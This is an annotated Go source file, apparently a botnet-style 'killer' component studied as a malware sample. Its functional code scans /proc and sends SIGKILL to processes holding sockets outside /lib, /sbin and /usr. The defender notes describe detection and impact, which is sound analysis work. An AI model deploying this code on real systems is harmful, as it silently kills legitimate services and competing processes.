package main

import (
    "fmt"
	"io/ioutil"
	"os"
	"path/filepath"
	"strconv"
	"strings"
	"syscall"
)

// Killer records one executable path handed to AddProcess. In this file that
// only happens right after a process has been sent SIGKILL successfully.
type Killer struct {
	RealPath string // link text returned by os.Readlink in the scan loops
}

// killers is the package-level list of recorded paths. AddProcess appends to
// it and FindRealPath searches it; nothing in this file removes entries or
// guards it with a lock.
var killers []Killer

// CheckPaths reports whether a process executable is exempt from the scan
// loops: true when file starts with "/lib/", "/sbin/" or "/usr/", or when file
// is exactly path (the callers pass the scanner's own executable path there).
//
// Analyst note: this is a plain string-prefix test on the link text read from
// /proc. Executables located anywhere else (for example under /bin/, /opt/ or
// /tmp/) are not exempt, so legitimate software installed outside the three
// prefixes is treated the same as anything else.
func CheckPaths(file, path string) bool {
	if file == path {
		return true
	}
	for _, prefix := range []string{"/lib/", "/sbin/", "/usr/"} {
		if strings.HasPrefix(file, prefix) {
			return true
		}
	}
	return false
}

// FindRealPath reports whether file occurs as a substring of any RealPath
// already stored in killers. The comparison is strings.Contains, not equality,
// so a shorter path matches every recorded path that contains it.
func FindRealPath(file string) bool {
	for i := range killers {
		if recorded := killers[i].RealPath; strings.Contains(recorded, file) {
			return true
		}
	}
	return false
}

// AddProcess appends file to killers as a new Killer entry. It performs no
// duplicate check of its own.
func AddProcess(file string) {
	entry := Killer{RealPath: file}
	killers = append(killers, entry)
}

// KillProcess sends SIGKILL to pid through syscall.Kill and returns that
// call's error unchanged.
//
// Analyst note: the target is addressed purely by PID number taken from an
// earlier /proc listing, so the signal goes to whatever process holds that PID
// when the call is made. The callers treat a nil error as "killed".
func KillProcess(pid int) error {
	return syscall.Kill(pid, syscall.SIGKILL)
}

// ShootList makes a second walk over /proc (Start calls it after its own
// pass) using the same descriptor test as Start. realPath is the scanner's own
// executable path and is handed to CheckPaths as the self-exemption. It
// returns nothing and silently gives up if /proc cannot be listed.
//
// Differences from Start that are visible in this file: the per-process link
// is read from /proc/<pid> rather than /proc/<pid>/exe, and a killed path is
// recorded only when FindRealPath does not already match it.
//
// Defender note: the observable behaviour is a single process reading links
// under /proc for every PID and issuing kill(pid, SIGKILL); an audit rule on
// the kill syscall is one way to surface it.
func ShootList(realPath string) {
	pids, err := ioutil.ReadDir("/proc")
	if err != nil {
		return
	}

	for _, pidEntry := range pids {
		// Only numeric directory names are PIDs; the scanner's own process
		// and its parent are never touched.
		pid, err := strconv.Atoi(pidEntry.Name())
		if err != nil || pid == os.Getpid() || pid == os.Getppid() {
			continue
		}

		// Link is read at /proc/<pid> here; any Readlink error skips the entry.
		exePath, err := os.Readlink(filepath.Join("/proc", pidEntry.Name()))
		if err != nil {
			continue
		}

		// Exempt paths: /lib/, /sbin/, /usr/ prefixes, or the scanner's own path.
		if CheckPaths(exePath, realPath) {
			continue
		}

		fdDir := filepath.Join("/proc", pidEntry.Name(), "fd")
		fdEntries, err := ioutil.ReadDir(fdDir)
		if err != nil {
			continue
		}

		for _, fdEntry := range fdEntries {
			fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
			if err != nil {
				continue
			}

			// A descriptor qualifies when its link text contains "socket:"
			// or "/proc" anywhere (substring match, not a prefix match).
			if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
				// The break sits inside the success branch: if the kill is
				// rejected, the remaining descriptors are still examined.
				if err := KillProcess(pid); err == nil {
					fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
					if !FindRealPath(exePath) {
						AddProcess(exePath)
					}
					break
				}
			}
		}
	}
}

// Start walks every numeric entry in /proc, skipping the current process and
// its parent. For each remaining process whose /proc/<pid>/exe link is not
// exempted by CheckPaths, it reads the process's fd directory and sends
// SIGKILL on the first descriptor whose link text contains "socket:" or
// "/proc". A successful kill is printed to stdout and the exe path is recorded
// with AddProcess. When the walk is done it calls ShootList(realPath).
// realPath is the scanner's own executable path, used as the self-exemption.
// Every error is swallowed: an unreadable /proc returns, anything else skips
// the entry.
//
// Defender notes:
//   - Behavioural signature: one process reading /proc/*/exe and /proc/*/fd/*
//     across all PIDs, followed by kill(pid, SIGKILL) against unrelated
//     processes. An audit rule on the kill syscall surfaces this.
//   - Impact: any process holding a socket whose binary lives outside /lib/,
//     /sbin/ and /usr/ is a candidate, which includes legitimate services and
//     agents installed elsewhere. Unexpected loss of such a service is itself
//     worth alerting on.
//   - Reach depends on the privileges this code runs with: reading another
//     user's /proc/<pid>/fd and signalling that process are both subject to
//     the kernel's permission checks, and mounting /proc with hidepid further
//     limits what an unprivileged process can enumerate.
//   - The stdout line beginning "[Killer] Found and killed process" is a fixed
//     literal in this sample.
func Start(realPath string) {
	procDir := "/proc"
	pids, err := ioutil.ReadDir(procDir)
	if err != nil {
		return
	}

	for _, pidEntry := range pids {
		// Only numeric directory names are PIDs; self and parent are skipped.
		pid, err := strconv.Atoi(pidEntry.Name())
		if err != nil || pid == os.Getpid() || pid == os.Getppid() {
			continue
		}

		// Resolve the process's executable; unreadable links skip the entry.
		exePath, err := os.Readlink(filepath.Join(procDir, pidEntry.Name(), "exe"))
		if err != nil {
			continue
		}

		// Exempt paths: /lib/, /sbin/, /usr/ prefixes, or the scanner's own
		// path (which also exempts other processes started from that path).
		if CheckPaths(exePath, realPath) {
			continue
		}

		fdDir := filepath.Join(procDir, pidEntry.Name(), "fd")
		fdEntries, err := ioutil.ReadDir(fdDir)
		if err != nil {
			continue
		}

		for _, fdEntry := range fdEntries {
			fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
			if err != nil {
				continue
			}

			// A descriptor qualifies when its link text contains "socket:"
			// or "/proc" anywhere (substring match, not a prefix match).
			if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
				// The break sits inside the success branch: if the kill is
				// rejected, the remaining descriptors are still examined.
				if err := KillProcess(pid); err == nil {
					fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
					// Recorded unconditionally here, so killers can hold
					// the same path more than once.
					AddProcess(exePath)
					break
				}
			}
		}
	}

	ShootList(realPath)
}

// StartKiller is the entry point of the scanner. It resolves the running
// program's own path with os.Executable and filepath.Abs and passes it to
// Start, where it serves as the self-exemption path. If either lookup fails it
// returns without scanning and without reporting the error.
func StartKiller() {
	executablePath, err := os.Executable()
	if err != nil {
		return
	}

	realPath, err := filepath.Abs(executablePath)
	if err != nil {
		return
	}

	Start(realPath)
}